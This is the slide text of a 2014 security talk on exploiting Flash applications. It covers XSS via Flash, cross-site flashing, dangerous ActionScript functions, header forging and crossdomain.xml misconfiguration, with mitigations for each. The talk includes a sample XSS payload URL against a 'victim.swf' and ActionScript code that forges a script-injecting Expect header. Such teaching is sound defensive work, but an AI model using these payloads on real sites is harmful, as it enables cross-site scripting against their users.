asHack

Exploiting Flash Applications

Abir Banerjee n|u Bangalore – 14 June 2014

References

• https://www.owasp.org/index.php/Category:OWASP_Flash_Security_Project • https://www.owasp.org/index.php/Testing_for_Cross_site_flashing_(OWASP-

DV-004) • http://blog.watchfire.com/FPI.pdf • http://habrahabr.ru/post/182706/ • http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashA

pplications.ppt • http://events.ccc.de/camp/2007/Fahrplan/attachments/1320-FlashSec.pdf • http://sethsec.blogspot.in/2014/03/exploiting-misconfigured-

crossdomainxml.html • http://gursevkalra.blogspot.in/2013/08/bypassing-same-origin-policy-with-

flash.html • http://www.andlabs.org/presentations/Test_Security_Flash.pdf • http://www.securityfocus.com/archive/1/441014/30/0/threaded

Introduction to Flash

• Multimedia Software Platform which has provided the Web with power of graphics, animation, games and many Rich Internet Applications (RIAs) that can be viewed, played and executed in Adobe Flash Player

• Flex -> Cousin of Flash which uses AS3 and helps in building

complex & flexible business logic especially used for Rich Internet Applications

• Browsers require Flash Plugins to play Flash Executable Files (SWF)

embedded in web pages. • Flash applications can be programmed using object-oriented

language called Action Script 2.0 / 3.0

Flash Myth? • Flash is Outdated, Dead, Attacks don’t work…etc. Is it true?

• It will exist as long as browsers support it !

• Majority of the attacks are due to programming flaws

Flash Application Security Concerns

• JavaScript execution is possible in Flash • Flash can be used to forge HTTP Headers

• Exploiting Cross Domain policy misconfiguration

• Flash + Clickjacking -> Leveraging for Camjacking ! • It can execute External Flash Movies • Flash can be Decompiled easily

Vulnerabilities in Flash

Client Side Vulnerabilities

• Cross-Site Scripting via Flash

• Potentially Dangerous Native Functions (PDNF)

• Cross-Site Flashing

• Abusing HTTP Headers & Cross Domain Policies

• Decompilation & Sensitive Data Storage

Server Side Vulnerabilities

• ActionScript Message Format (AMF) Tampering

• Remote Calls, Service Enumeration, Injection etc.

Decompiling Flash • SWF files are interpreted by a virtual machine embedded in the player itself.

Decompilers

• HP SwfScan

• Flare

• Jpex Free Flash Decompiler

• Sothink Decompiler

• Flash Decompiler Trillix

Impact

• It can be easily decompiled & analyzed for checking insecure programming, hard coded credentials

Mitigation

• Sanitize user input, avoid hard coding of data,

• Use de-obfuscation as a deterrence

Cross-Site Scripting (XSS)

• A Flash SWF can access it’s host DOM depending on access policy

• Flash SWF can modify the DOM of it’s host

Impact

• XSS attack on host DOM causing malicious script execution

Mitigation

• Sanitize user input

XSS Continued… _global and _root objects

• Attributes of _global and _root objects are represented as:

_root.variableName

_global.variableName

• Flashvars, Injection in HTML Text Fields

• Unsafe Methods

What is the Problem?

• If variables are undefined then they can be initialized

from the query string

• Usage of Insecure Functions

• Unsanitized Input

Exploitation

• Unsafe methods use URL as function -> can be called from query string

• HTML Test Injection-

Typical Payload –

http://victim.com/victim.swf?asfunction:getURL,javascript:evilcode

Cross-Site Flashing

• Cross-Site Flashing occurs when one SWF or movie loads another SWF or movie

• It can be performed by forcing a flawed SWF to load an external evil flash file.

• XSF can also be used in presence of Flash HTML Injection or external SWF Files when loadMovie* methods are used.

Impact

• This attack can lead to Phishing Attacks or loading malicious files

Mitigation

• Initialize Variables & Sanitize user input

• Use Strict Cross Domain Policies

• If not required, don’t allow external swf to be run as _level 0

Potentially Dangerous Native Function (PDNF)

Vulnerable Functions in ActionScript 2.0

• getURL()

• loadMovie()

• loadMovieNum()

• LoadVars.load()

• LoadVars.send()

• FScrollPane.loadScrollContent()

• Sound.loadSound()

• NetStream.play()

• XML.load()

What’s the Problem?

• All of these functions take URL as an input parameter

Mitigation

• Initialize Variables and Sanitize user input

Abusing HTTP Headers • Flash has capability of sending Forged HTTP headers thereby allowing Header Injection Vulnerabilities

How to use it?

• Following Syntax is for ActionScript 2.0 for sending GET request to victim site say http://www.victim.com/page.php?p1=a&p2=b with an arbitrary header (Expect: <script>alert(1)</script>)

For GET Request

• var req:LoadVars=new LoadVars(); req.addRequestHeader(“Expect",“<script>alert(1)</script>"); req.send("http://www.victim.com/page.php?p1=a&p2=b", "_blank","GET");

For POST Request

• var req:LoadVars=new LoadVars(); req.addRequestHeader(" Expect",“<script>alert(1)</script"); req.decode("a=b&c=d"); req.send(" http://www.victim.com/page.php?p1=a&p2=b ", "_blank","POST");

• The request is sent from the browser invoking the Flash object. Any cookies the browser normally sends, will be sent in those cases as well. The browser's User-Agent is sent, as well as all browser standard headers. HTTPS links are supported.

Cross Domain Access Policies

• Crossdomain.xml - a policy file that allows SWF files from external domains to make HTTP calls to your domain Sample Crossdomain.xml file <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for mysite.com --> <cross-domain-policy> <!-- This is a master-policy file --> <site-control permitted-cross-domain-policies="master-only"/> <allow-access-from domain="www.example.com" secure="true" /> <allow-access-from domain=“*.example.com“ /> </cross-domain-policy>

• Crossdomain.xml - a policy file that allows SWF files from external domains to make HTTP calls to your domain Good Crossdomain.xml file <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for mysite.com --> <cross-domain-policy> <!-- This is a master-policy file --> <site-control permitted-cross-domain-policies="master-only"/> <allow-access-from domain="www.example.com" secure="true" /> <allow-access-from domain=“*.example.com“ /> </cross-domain-policy> Bad Crossdomain.xml file <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for mysite.com --> <cross-domain-policy> <!-- This is a master-policy file --> <site-control permitted-cross-domain-policies=“*"/> <allow-access-from domain=“*"/> </cross-domain-policy> Threat –If user A is logged in on www.abc.com and user visits www.def.com and a Malicious SWF file is loaded there, it can access your data on www.abc.com Mitigation – Never use “*”

Cross Domain Access Policies

AllowScriptAccess <object id='MyMovie.swf' classid='clsid:D27CDB6E-AE6D-11cf-96B8- 444553540000' codebase='http://download.adobe.com/pub/shockwave/cabs/flash/swflash. cab#version=9,0,0,0' height='100%' width='100%'> <param name='allowScriptAccess' value=‘sameDomain'/> OWASP <param name='src' value=''MyMovie.swf'/> <embed name='MyMovie.swf' pluginspage='/go/getflashplayer' src='MyMovie.swf' height='100%' width='100%' allowScriptAccess=‘sameDomain'/> </object> Mitigation Do NOT use allowScriptAccess=‘*’

Cross Domain Access Policies

LocalConnection – Used for inter process communication between flash One Flash file can call methods of other flash file even if they are from different domains Access Control is enforced using- LocalConnection.allowDomain() method Mitigation • Do NOT use LocalConnection.allowDomain(‘*’) as it allows

SWF files from all domain

Cross Domain Access Policies

Security.allowDomain() Normally SWF loaded from www.a.com cannot access the variable, objects, properties and methods of SWF loaded from www.b.com but Security.allowDomain() can be used to bypass this security restriction. HTTP to HTTPS restriction can be overcome using System.security.allowInsecureDomain() - BAD IDEA!! System.security.allowDomain("*") – BAD IDEA!!

Cross Domain Access Policies

Camjacking

• Camjacking refers to hijacking of Camera using clickjacking in Flash

Thank You

Questions or Feedback?